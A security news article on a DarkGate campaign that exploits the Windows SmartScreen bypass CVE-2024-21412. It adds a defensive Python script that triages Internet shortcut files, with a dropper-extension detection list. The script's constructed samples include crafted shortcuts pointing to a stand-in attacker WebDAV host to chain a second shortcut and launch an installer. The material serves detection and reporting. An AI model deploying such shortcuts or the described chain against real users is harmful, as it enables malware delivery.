14 March 2024

DarkGate malware exploits recently patched Windows SmartScreen zero-day bug


Trend Micro analysts have uncovered a DarkGate malware campaign that has been exploiting a Windows SmartScreen vulnerability, patched only in February, as a zero-day to distribute the malware since mid-January 2024.

Tracked as CVE-2024-21412, the flaw is a Microsoft Defender SmartScreen security feature bypass caused by improper validation of Internet shortcut (.url) files. A remote attacker can trick a victim into opening a specially crafted shortcut that Windows launches without the SmartScreen warning normally shown for files carrying a Mark of the Web; in the exploitation Trend Micro analysed, the crafted shortcut points to a second shortcut hosted on an attacker-controlled WebDAV share, and the chain ends with arbitrary code executing on the system in the context of the user. Microsoft fixed the flaw in its February 2024 Patch Tuesday updates.
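Because the bypass hinges on how Internet shortcut files are handled, a cheap post-patch hunt is to triage any .url files found in mail attachments or download folders for targets that chain to a second .url or to an installer on a remote SMB/WebDAV host. The following script is an added example and is not code from the article or from Trend Micro; the chained-shortcut pattern it looks for is the one described in the public analysis of CVE-2024-21412, the severity labels and function names are this example's own, and the sample shortcut contents and the 203.0.113.10 host are constructed for the demonstration.

```python
r"""Triage Windows Internet Shortcut (.url) files for the chained-shortcut
pattern used against CVE-2024-21412 (added example, not the article's code).

A .url file is a small INI-style text file: an [InternetShortcut] section
whose URL= key names the target Windows opens.  The reported bypass starts
from a .url whose target is a *second* .url on an attacker-controlled WebDAV
or SMB share, so the second file is opened without the SmartScreen prompt a
Mark-of-the-Web-tagged download would normally trigger.
"""
import configparser
import os
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Extensions worth flagging when they are fetched from a remote share.
CHAINED_EXT = {".url"}
DROPPER_EXT = {".msi", ".exe", ".lnk", ".hta", ".js", ".vbs", ".bat", ".cmd", ".dll"}


@dataclass
class Finding:
    name: str      # label of the examined shortcut (the file name in a real scan)
    target: str    # the URL= value
    verdict: str   # critical / high / medium / info / low / error
    reason: str


def parse_internet_shortcut(text: str) -> str:
    """Return the URL= target of a .url file, or raise ValueError."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # keep key case as written
    cp.read_string(text.lstrip("\ufeff"))     # tolerate a UTF-8 BOM
    if not cp.has_section("InternetShortcut"):
        raise ValueError("missing [InternetShortcut] section")
    url = cp.get("InternetShortcut", "URL", fallback="").strip()
    if not url:
        raise ValueError("missing URL= key")
    return url


def remote_host_and_path(target: str) -> tuple[str, str]:
    r"""Split a UNC (\\host\share\f) or file://host/f target into (host, path).
    Returns ('', '') for anything that is not a remote file target."""
    t = target.strip()
    if t.startswith("\\\\"):
        parts = [p for p in t[2:].split("\\") if p]
        return (parts[0].lower(), "/" + "/".join(parts[1:])) if parts else ("", "")
    s = urlsplit(t)
    if s.scheme.lower() == "file" and s.netloc:
        # netloc keeps WebDAV port syntax such as host@80 or host@SSL@443 intact
        return s.netloc.lower(), unquote(s.path)
    return "", ""


def classify_target(target: str) -> tuple[str, str]:
    """Return (verdict, reason) for one URL= target."""
    host, path = remote_host_and_path(target)
    if host:
        ext = os.path.splitext(path)[1].lower()
        if ext in CHAINED_EXT:
            return "critical", f"chains to a second .url on remote host {host} (CVE-2024-21412 pattern)"
        if ext in DROPPER_EXT:
            return "high", f"launches {ext} directly from remote host {host}"
        return "medium", f"opens a file from remote host {host} (SMB/WebDAV)"
    scheme = urlsplit(target.strip()).scheme.lower()
    if scheme in ("http", "https"):
        return "info", "ordinary web link"
    return "low", "local or unrecognised target"


def triage(shortcuts: dict[str, str]) -> list[Finding]:
    """Parse and classify a mapping of name -> .url file contents."""
    findings = []
    for name, text in shortcuts.items():
        try:
            target = parse_internet_shortcut(text)
        except ValueError as exc:
            findings.append(Finding(name, "", "error", str(exc)))
            continue
        verdict, reason = classify_target(target)
        findings.append(Finding(name, target, verdict, reason))
    return findings


# Constructed samples, not real campaign artefacts; 203.0.113.10 is from a
# documentation address range and stands in for an attacker-controlled WebDAV host.
SAMPLE_SHORTCUTS = {
    "benign.url": "[InternetShortcut]\r\nURL=https://example.com/docs/\r\n",
    "stage1.url": (
        "[InternetShortcut]\r\n"
        "URL=file://203.0.113.10@80/DavWWWRoot/share/stage2.url\r\n"
        "IDList=\r\nIconIndex=1\r\n"
    ),
    "installer.url": "[InternetShortcut]\r\nURL=\\\\203.0.113.10@80\\DavWWWRoot\\share\\setup.msi\r\n",
    "broken.url": "[NotAShortcut]\r\nFoo=bar\r\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_SHORTCUTS):
        print(f"{f.verdict:8} {f.name:14} {f.target}  ({f.reason})")
```

Anything rated critical or high deserves a look at the remote host in proxy and SMB/WebDAV egress logs; the script deliberately flags any remote file target at medium as well, since a shortcut that opens content from an external share is rarely legitimate in user mail.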

Trend Micro first reported in February that CVE-2024-21412 had been exploited as a zero-day by a threat actor tracked as Water Hydra (aka DarkCasino), whose attack chain targeted financial market traders. The company has now published a detailed technical write-up on a second campaign that abused the same flaw, this time to deliver DarkGate.

The DarkGate campaign used a multi-pronged approach, with the primary method being exploitation of CVE-2024-21412 via fake software installers. These installers, disguised as legitimate applications such as Apple iTunes, Notion and NVIDIA software, bundled a malicious DLL alongside a legitimate executable that sideloads it; the DLL then decrypts and loads the DarkGate payload on the victim's machine.

A notable aspect of this campaign is the use of PDFs whose links abuse Google DoubleClick Digital Marketing (DDM) open redirects. The redirects sent users to compromised web servers hosting the SmartScreen bypass exploit, the crafted Internet shortcut, which in turn led to the download of the malicious .MSI installers.

DarkGate is sold under a malware-as-a-service (MaaS) model and is popular among financially motivated threat actors worldwide; cybercriminals have used it against organizations in North America, Europe, Asia and Africa.
